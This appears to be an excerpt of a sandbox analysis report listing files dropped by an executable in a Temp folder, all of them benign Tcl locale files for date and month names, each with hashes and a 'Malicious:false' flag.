                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset it DAYS_OF_WEEK_ABBREV [list \. "dom"\. "lun"\. "mar"\. "mer"\. "gio"\. "ven"\. "sab"]. ::msgcat::mcset it DAYS_OF_WEEK_FULL [list \. "domenica"\. "luned\u00ec"\. "marted\u00ec"\. "mercoled\u00ec"\. "gioved\u00ec"\. "venerd\u00ec"\. "sabato"]. ::msgcat::mcset it MONTHS_ABBREV [list \. "gen"\. "feb"\. "mar"\. "apr"\. "mag"\. "giu"\. "lug"\. "ago"\. "set"\. "ott"\. "nov"\. "dic"\. ""]. ::msgcat::mcset it MONTHS_FULL [list \. "gennaio"\. "febbraio"\. "marzo"\. "aprile"\. "maggio"\. "giugno"\. "luglio"\. "agosto"\. "settembre"\. "ottobre"\. "novembre"\. "dicembre"\. ""]. ::msgcat::mcset it BCE "aC". ::msgc
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):244
                                                                                                                                                                                                                                                    Entropy (8bit):4.851375233848049
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset it_CH DATE_FORMAT "%e. %B %Y". ::msgcat::mcset it_CH TIME_FORMAT "%H:%M:%S". ::msgcat::mcset it_CH DATE_TIME_FORMAT "%e. %B %Y %H:%M:%S %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1664
                                                                                                                                                                                                                                                    Entropy (8bit):4.88149888596689
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ja DAYS_OF_WEEK_ABBREV [list \. "\u65e5"\. "\u6708"\. "\u706b"\. "\u6c34"\. "\u6728"\. "\u91d1"\. "\u571f"]. ::msgcat::mcset ja DAYS_OF_WEEK_FULL [list \. "\u65e5\u66dc\u65e5"\. "\u6708\u66dc\u65e5"\. "\u706b\u66dc\u65e5"\. "\u6c34\u66dc\u65e5"\. "\u6728\u66dc\u65e5"\. "\u91d1\u66dc\u65e5"\. "\u571f\u66dc\u65e5"]. ::msgcat::mcset ja MONTHS_FULL [list \. "1\u6708"\. "2\u6708"\. "3\u6708"\. "4\u6708"\. "5\u6708"\. "6\u6708"\. "7\u6708"\. "8\u6708"\. "9\u6708"\. "10\u6708"\. "11\u6708"\. "12\u6708"]. ::msgcat::mcset ja BCE "\u7d00\u5143\u524d". ::msgcat::mcset ja CE "\u897f\u66a6". ::msgcat::mcset ja AM "\u5348\u524d". ::msgcat::mcset ja PM "\u5348\u5f8c". ::msgcat::mcset ja DATE_FORMAT "%Y/%m/%
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):978
                                                                                                                                                                                                                                                    Entropy (8bit):4.013253613061898
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset kl DAYS_OF_WEEK_ABBREV [list \. "sab"\. "ata"\. "mar"\. "pin"\. "sis"\. "tal"\. "arf"]. ::msgcat::mcset kl DAYS_OF_WEEK_FULL [list \. "sabaat"\. "ataasinngorneq"\. "marlunngorneq"\. "pingasunngorneq"\. "sisamanngorneq"\. "tallimanngorneq"\. "arfininngorneq"]. ::msgcat::mcset kl MONTHS_ABBREV [list \. "jan"\. "feb"\. "mar"\. "apr"\. "maj"\. "jun"\. "jul"\. "aug"\. "sep"\. "okt"\. "nov"\. "dec"\. ""]. ::msgcat::mcset kl MONTHS_FULL [list \. "januari"\. "februari"\. "martsi"\. "aprili"\. "maji"\. "juni"\. "juli"\. "augustusi"\. "septemberi"\. "oktoberi"\. "novemberi"\. "decemberi"\. ""].}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):279
                                                                                                                                                                                                                                                    Entropy (8bit):4.83493357349932
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset kl_GL DATE_FORMAT "%d %b %Y". ::msgcat::mcset kl_GL TIME_FORMAT "%T". ::msgcat::mcset kl_GL TIME_FORMAT_12 "%T". ::msgcat::mcset kl_GL DATE_TIME_FORMAT "%a %d %b %Y %T %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1566
                                                                                                                                                                                                                                                    Entropy (8bit):4.552910804130986
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ko DAYS_OF_WEEK_ABBREV [list \. "\uc77c"\. "\uc6d4"\. "\ud654"\. "\uc218"\. "\ubaa9"\. "\uae08"\. "\ud1a0"]. ::msgcat::mcset ko DAYS_OF_WEEK_FULL [list \. "\uc77c\uc694\uc77c"\. "\uc6d4\uc694\uc77c"\. "\ud654\uc694\uc77c"\. "\uc218\uc694\uc77c"\. "\ubaa9\uc694\uc77c"\. "\uae08\uc694\uc77c"\. "\ud1a0\uc694\uc77c"]. ::msgcat::mcset ko MONTHS_ABBREV [list \. "1\uc6d4"\. "2\uc6d4"\. "3\uc6d4"\. "4\uc6d4"\. "5\uc6d4"\. "6\uc6d4"\. "7\uc6d4"\. "8\uc6d4"\. "9\uc6d4"\. "10\uc6d4"\. "11\uc6d4"\. "12\uc6d4"\. ""]. ::msgcat::mcset ko MONTHS_FULL [list \. "1\uc6d4"\. "2\uc6d4"\. "3\uc6d4"\. "4\uc6d4"\. "5\uc6d4"\. "6\uc6d4"\. "7\uc6d4"\. "8\uc6d4"\.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):346
                                                                                                                                                                                                                                                    Entropy (8bit):5.015790750376121
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ko_KR BCE "\uae30\uc6d0\uc804". ::msgcat::mcset ko_KR CE "\uc11c\uae30". ::msgcat::mcset ko_KR DATE_FORMAT "%Y.%m.%d". ::msgcat::mcset ko_KR TIME_FORMAT_12 "%P %l:%M:%S". ::msgcat::mcset ko_KR DATE_TIME_FORMAT "%Y.%m.%d %P %l:%M:%S %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1958
                                                                                                                                                                                                                                                    Entropy (8bit):4.1451019501109965
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset kok DAYS_OF_WEEK_FULL [list \. "\u0906\u0926\u093f\u0924\u094d\u092f\u0935\u093e\u0930"\. "\u0938\u094b\u092e\u0935\u093e\u0930"\. "\u092e\u0902\u0917\u0933\u093e\u0930"\. "\u092c\u0941\u0927\u0935\u093e\u0930"\. "\u0917\u0941\u0930\u0941\u0935\u093e\u0930"\. "\u0936\u0941\u0915\u094d\u0930\u0935\u093e\u0930"\. "\u0936\u0928\u093f\u0935\u093e\u0930"]. ::msgcat::mcset kok MONTHS_ABBREV [list \. "\u091c\u093e\u0928\u0947\u0935\u093e\u0930\u0940"\. "\u092b\u0947\u092c\u0943\u0935\u093e\u0930\u0940"\. "\u092e\u093e\u0930\u094d\u091a"\. "\u090f\u092a\u094d\u0930\u093f\u0932"\. "\u092e\u0947"\. "\u091c\u0942\u0928"\. "\u091c\u0941\u0932\u0948"\. "\u0913\u0917\u0938\u094d\u091f"\. "\u0938\u0947\u092a\u094d\u091f\u0947\u0902\u092c\u0930"\. "\u0913\u0915\u094d\u091f\u094b\u092c\u0
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):254
                                                                                                                                                                                                                                                    Entropy (8bit):4.8580653411441155
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset kok_IN DATE_FORMAT "%d %M %Y". ::msgcat::mcset kok_IN TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset kok_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):966
                                                                                                                                                                                                                                                    Entropy (8bit):3.9734955453120504
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset kw DAYS_OF_WEEK_ABBREV [list \. "Sul"\. "Lun"\. "Mth"\. "Mhr"\. "Yow"\. "Gwe"\. "Sad"]. ::msgcat::mcset kw DAYS_OF_WEEK_FULL [list \. "De Sul"\. "De Lun"\. "De Merth"\. "De Merher"\. "De Yow"\. "De Gwener"\. "De Sadorn"]. ::msgcat::mcset kw MONTHS_ABBREV [list \. "Gen"\. "Whe"\. "Mer"\. "Ebr"\. "Me"\. "Evn"\. "Gor"\. "Est"\. "Gwn"\. "Hed"\. "Du"\. "Kev"\. ""]. ::msgcat::mcset kw MONTHS_FULL [list \. "Mys Genver"\. "Mys Whevrel"\. "Mys Merth"\. "Mys Ebrel"\. "Mys Me"\. "Mys Evan"\. "Mys Gortheren"\. "Mye Est"\. "Mys Gwyngala"\. "Mys Hedra"\. "Mys Du"\. "Mys Kevardhu"\. ""].}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.914818138642697
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset kw_GB DATE_FORMAT "%d %B %Y". ::msgcat::mcset kw_GB TIME_FORMAT_12 "%l:%M:%S %P". ::msgcat::mcset kw_GB DATE_TIME_FORMAT "%d %B %Y %l:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1255
                                                                                                                                                                                                                                                    Entropy (8bit):4.4416408590245
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset lt DAYS_OF_WEEK_ABBREV [list \. "Sk"\. "Pr"\. "An"\. "Tr"\. "Kt"\. "Pn"\. "\u0160t"]. ::msgcat::mcset lt DAYS_OF_WEEK_FULL [list \. "Sekmadienis"\. "Pirmadienis"\. "Antradienis"\. "Tre\u010diadienis"\. "Ketvirtadienis"\. "Penktadienis"\. "\u0160e\u0161tadienis"]. ::msgcat::mcset lt MONTHS_ABBREV [list \. "Sau"\. "Vas"\. "Kov"\. "Bal"\. "Geg"\. "Bir"\. "Lie"\. "Rgp"\. "Rgs"\. "Spa"\. "Lap"\. "Grd"\. ""]. ::msgcat::mcset lt MONTHS_FULL [list \. "Sausio"\. "Vasario"\. "Kovo"\. "Baland\u017eio"\. "Gegu\u017e\u0117s"\. "Bir\u017eelio"\. "Liepos"\. "Rugpj\u016b\u010dio"\. "Rugs\u0117jo"\. "Spalio"\. "Lapkri\u010dio"\. "G
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1219
                                                                                                                                                                                                                                                    Entropy (8bit):4.39393801727056
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset lv DAYS_OF_WEEK_ABBREV [list \. "Sv"\. "P"\. "O"\. "T"\. "C"\. "Pk"\. "S"]. ::msgcat::mcset lv DAYS_OF_WEEK_FULL [list \. "sv\u0113tdiena"\. "pirmdiena"\. "otrdiena"\. "tre\u0161diena"\. "ceturdien"\. "piektdiena"\. "sestdiena"]. ::msgcat::mcset lv MONTHS_ABBREV [list \. "Jan"\. "Feb"\. "Mar"\. "Apr"\. "Maijs"\. "J\u016bn"\. "J\u016bl"\. "Aug"\. "Sep"\. "Okt"\. "Nov"\. "Dec"\. ""]. ::msgcat::mcset lv MONTHS_FULL [list \. "janv\u0101ris"\. "febru\u0101ris"\. "marts"\. "apr\u012blis"\. "maijs"\. "j\u016bnijs"\. "j\u016blijs"\. "augusts"\. "septembris"\. "oktobris"\. "novembris"\. "decembris"\. ""]. ::msgcat
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):2105
                                                                                                                                                                                                                                                    Entropy (8bit):4.237536682442766
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset mk DAYS_OF_WEEK_ABBREV [list \. "\u043d\u0435\u0434."\. "\u043f\u043e\u043d."\. "\u0432\u0442."\. "\u0441\u0440\u0435."\. "\u0447\u0435\u0442."\. "\u043f\u0435\u0442."\. "\u0441\u0430\u0431."]. ::msgcat::mcset mk DAYS_OF_WEEK_FULL [list \. "\u043d\u0435\u0434\u0435\u043b\u0430"\. "\u043f\u043e\u043d\u0435\u0434\u0435\u043b\u043d\u0438\u043a"\. "\u0432\u0442\u043e\u0440\u043d\u0438\u043a"\. "\u0441\u0440\u0435\u0434\u0430"\. "\u0447\u0435\u0442\u0432\u0440\u0442\u043e\u043a"\. "\u043f\u0435\u0442\u043e\u043a"\. "\u0441\u0430\u0431\u043e\u0442\u0430"]. ::msgcat::mcset mk MONTHS_ABBREV [list \. "\u0458\u0430\u043d."\. "\u0444\u0435\u0432."\. "\u043c\u0430\u0440."\. "\u0430\u043f\u0440."\. "\u043c\u0430\u0458."\. "\u0458\u0443\u043d."\. "\u0458\
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1807
                                                                                                                                                                                                                                                    Entropy (8bit):4.160320823510059
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8ocYe48VcOVczyVczoRSVcqVcR0q4vTqBBiPNVcqVcR0q4vTqBBil:46R48h0qpBBkI0qpBBe
                                                                                                                                                                                                                                                    MD5:791408BAE710B77A27AD664EC3325E1C
                                                                                                                                                                                                                                                    SHA1:E760B143A854838E18FFB66500F4D312DD80634E
                                                                                                                                                                                                                                                    SHA-256:EB2E2B7A41854AF68CEF5881CF1FBF4D38E70D2FAB2C3F3CE5901AA5CC56FC15
                                                                                                                                                                                                                                                    SHA-512:FE91EF67AB9313909FE0C29D5FBE2298EE35969A26A63D94A406BFDA7BCF932F2211F94C0E3C1D718DBC2D1145283C768C23487EEB253249ACFE76E8D1F1D1E5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset mr DAYS_OF_WEEK_FULL [list \. "\u0930\u0935\u093f\u0935\u093e\u0930"\. "\u0938\u094b\u092e\u0935\u093e\u0930"\. "\u092e\u0902\u0917\u0933\u0935\u093e\u0930"\. "\u092e\u0902\u0917\u0933\u0935\u093e\u0930"\. "\u0917\u0941\u0930\u0941\u0935\u093e\u0930"\. "\u0936\u0941\u0915\u094d\u0930\u0935\u093e\u0930"\. "\u0936\u0928\u093f\u0935\u093e\u0930"]. ::msgcat::mcset mr MONTHS_ABBREV [list \. "\u091c\u093e\u0928\u0947\u0935\u093e\u0930\u0940"\. "\u092b\u0947\u092c\u0943\u0935\u093e\u0930\u0940"\. "\u092e\u093e\u0930\u094d\u091a"\. "\u090f\u092a\u094d\u0930\u093f\u0932"\. "\u092e\u0947"\. "\u091c\u0942\u0928"\. "\u091c\u0941\u0932\u0948"\. "\u0913\u0917\u0938\u094d\u091f"\. "\u0938\u0947\u092a\u094d\u091f\u0947\u0902\u092c\u0930"\. "\u0913\u0915\u094d\u091f\u094b\u092c\u0930"\.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):251
                                                                                                                                                                                                                                                    Entropy (8bit):4.847742455062573
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmoGNv+9/LoGU3v6rZoGNo+3v+6f6HK:4EnLzu8GvWe3v6r5F3vmq
                                                                                                                                                                                                                                                    MD5:899E845D33CAAFB6AD3B1F24B3F92843
                                                                                                                                                                                                                                                    SHA1:FC17A6742BF87E81BBD4D5CB7B4DCED0D4DD657B
                                                                                                                                                                                                                                                    SHA-256:F75A29BB323DB4354B0C759CB1C8C5A4FFC376DFFD74274CA60A36994816A75C
                                                                                                                                                                                                                                                    SHA-512:99D05FCE8A9C9BE06FDA8B54D4DE5497141F6373F470B2AB24C2D00B9C56031350F5DCDA2283A0E6F5B09FF21218FC3C7E2A6AB8ECC5BB020546FD62BDC8FF99
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset mr_IN DATE_FORMAT "%d %M %Y". ::msgcat::mcset mr_IN TIME_FORMAT_12 "%I:%M:%S %P". ::msgcat::mcset mr_IN DATE_TIME_FORMAT "%d %M %Y %I:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):910
                                                                                                                                                                                                                                                    Entropy (8bit):3.9292866027924838
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:4EnLzu82mCBuvFYcEfmt1qWjefjESRsToOqrlHvFguSixTRs1OAfC67:4azu82nBuHEfKxjeby7cl9gbZUAfCc
                                                                                                                                                                                                                                                    MD5:441CC737D383D8213F64B62A5DBEEC3E
                                                                                                                                                                                                                                                    SHA1:34FBE99FB25A0DCA2FDA2C008AC8127BA2BC273B
                                                                                                                                                                                                                                                    SHA-256:831F611EE851A64BF1BA5F9A5441EC1D50722FA9F15B4227707FE1927F754DE4
                                                                                                                                                                                                                                                    SHA-512:0474B2127890F63814CD9E77D156B5E4FC45EB3C17A57719B672AC9E3A6EEA9934F0BE158F76808B34A11DA844AB900652C18E512830278DFED2666CD005FBE5
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ms DAYS_OF_WEEK_ABBREV [list \. "Aha"\. "Isn"\. "Sei"\. "Rab"\. "Kha"\. "Jum"\. "Sab"]. ::msgcat::mcset ms DAYS_OF_WEEK_FULL [list \. "Ahad"\. "Isnin"\. "Selasa"\. "Rahu"\. "Khamis"\. "Jumaat"\. "Sabtu"]. ::msgcat::mcset ms MONTHS_ABBREV [list \. "Jan"\. "Feb"\. "Mac"\. "Apr"\. "Mei"\. "Jun"\. "Jul"\. "Ogos"\. "Sep"\. "Okt"\. "Nov"\. "Dis"\. ""]. ::msgcat::mcset ms MONTHS_FULL [list \. "Januari"\. "Februari"\. "Mac"\. "April"\. "Mei"\. "Jun"\. "Julai"\. "Ogos"\. "September"\. "Oktober"\. "November"\. "Disember"\. ""].}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):259
                                                                                                                                                                                                                                                    Entropy (8bit):4.770028367699931
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:6:SlSyEtJLlpuoo6dmoChFflD/LoChF+3v6xH5oCh++3vflm6PYv:4EnLzu8IPflD/ne3v6Tl3vflm6q
                                                                                                                                                                                                                                                    MD5:8261689A45FB754158B10B044BDC4965
                                                                                                                                                                                                                                                    SHA1:6FFC9B16A0600D9BC457322F1316BC175309C6CA
                                                                                                                                                                                                                                                    SHA-256:D05948D75C06669ADDB9708BC5FB48E6B651D4E62EF1B327EF8A3F605FD5271C
                                                                                                                                                                                                                                                    SHA-512:0321A5C17B3E33FDE9480AC6014B373D1663219D0069388920D277AA61341B8293883517C900030177FF82D65340E6C9E3ED051B27708DD093055E3BE64B2AF3
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset ms_MY DATE_FORMAT "%A %d %b %Y". ::msgcat::mcset ms_MY TIME_FORMAT_12 "%I:%M:%S %z". ::msgcat::mcset ms_MY DATE_TIME_FORMAT "%A %d %b %Y %I:%M:%S %z %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):690
                                                                                                                                                                                                                                                    Entropy (8bit):4.48913642143724
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:12:4EnLzu8+YmWjjRgWfjxBTo4erxy1IGZzNN+3v6amK3vZsq:4azu8+YZjjRXbfNedy1IG5N6vjmsvGq
                                                                                                                                                                                                                                                    MD5:CE7E67A03ED8C3297C6A5B634B55D144
                                                                                                                                                                                                                                                    SHA1:3DA5ACC0F52518541810E7F2FE57751955E12BDA
                                                                                                                                                                                                                                                    SHA-256:D115718818E3E3367847CE35BB5FF0361D08993D9749D438C918F8EB87AD8814
                                                                                                                                                                                                                                                    SHA-512:3754AA7B7D27A813C6113D2AA834A951FED1B81E4DACE22C81E0583F29BBC73C014697F39A2067DEC622D98EACD70D26FD40F80CF6D09E1C949F01FADED52C74
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset mt DAYS_OF_WEEK_ABBREV [list \. "\u0126ad"\. "Tne"\. "Tli"\. "Erb"\. "\u0126am"\. "\u0120im"]. ::msgcat::mcset mt MONTHS_ABBREV [list \. "Jan"\. "Fra"\. "Mar"\. "Apr"\. "Mej"\. "\u0120un"\. "Lul"\. "Awi"\. "Set"\. "Ott"\. "Nov"]. ::msgcat::mcset mt BCE "QK". ::msgcat::mcset mt CE "". ::msgcat::mcset mt DATE_FORMAT "%A, %e ta %B, %Y". ::msgcat::mcset mt TIME_FORMAT_12 "%l:%M:%S %P". ::msgcat::mcset mt DATE_TIME_FORMAT "%A, %e ta %B, %Y %l:%M:%S %P %z".}.
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1157
                                                                                                                                                                                                                                                    Entropy (8bit):4.24006506188001
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu8CKEj4/xasSpfiTBtHQT1V/W3WNfvZv3l:46KU/0s2iTeVOiHN1
                                                                                                                                                                                                                                                    MD5:D5509ABF5CBFB485C20A26FCC6B1783E
                                                                                                                                                                                                                                                    SHA1:53A298FBBF09AE2E223B041786443A3D8688C9EB
                                                                                                                                                                                                                                                    SHA-256:BC401889DD934C49D10D99B471441BE2B536B1722739C7B0AB7DE7629680F602
                                                                                                                                                                                                                                                    SHA-512:BDAFBA46EF44151CFD9EF7BC1909210F6DB2BAC20C31ED21AE3BE7EAC785CD4F545C4590CF551C0D066F982E2050F5844BDDC569F32C5804DBDE657F4511A6FE
                                                                                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                                                                                    Reputation:unknown
                                                                                                                                                                                                                                                    Preview:# created by tools/loadICU.tcl -- do not edit.namespace eval ::tcl::clock {. ::msgcat::mcset nb DAYS_OF_WEEK_ABBREV [list \. "s\u00f8"\. "ma"\. "ti"\. "on"\. "to"\. "fr"\. "l\u00f8"]. ::msgcat::mcset nb DAYS_OF_WEEK_FULL [list \. "s\u00f8ndag"\. "mandag"\. "tirsdag"\. "onsdag"\. "torsdag"\. "fredag"\. "l\u00f8rdag"]. ::msgcat::mcset nb MONTHS_ABBREV [list \. "jan"\. "feb"\. "mar"\. "apr"\. "mai"\. "jun"\. "jul"\. "aug"\. "sep"\. "okt"\. "nov"\. "des"\. ""]. ::msgcat::mcset nb MONTHS_FULL [list \. "januar"\. "februar"\. "mars"\. "april"\. "mai"\. "juni"\. "juli"\. "august"\. "september"\. "oktober"\. "november"\. "desember"\. ""]. ::msgcat::mcset nb BCE "f.Kr.". ::msgcat::mcset nb CE "e.Kr.".
                                                                                                                                                                                                                                                    Process:C:\Users\user\AppData\Local\Temp\1027565001\0fb12e043c.exe
                                                                                                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                                                                                    Size (bytes):1079
                                                                                                                                                                                                                                                    Entropy (8bit):4.158523842311663
                                                                                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                                                                                    SSDEEP:24:4azu84LFiS8LMKZoNfSZTNTQhFCNZvtWvg:46Oi5LMKZASZTEF2Ntgg
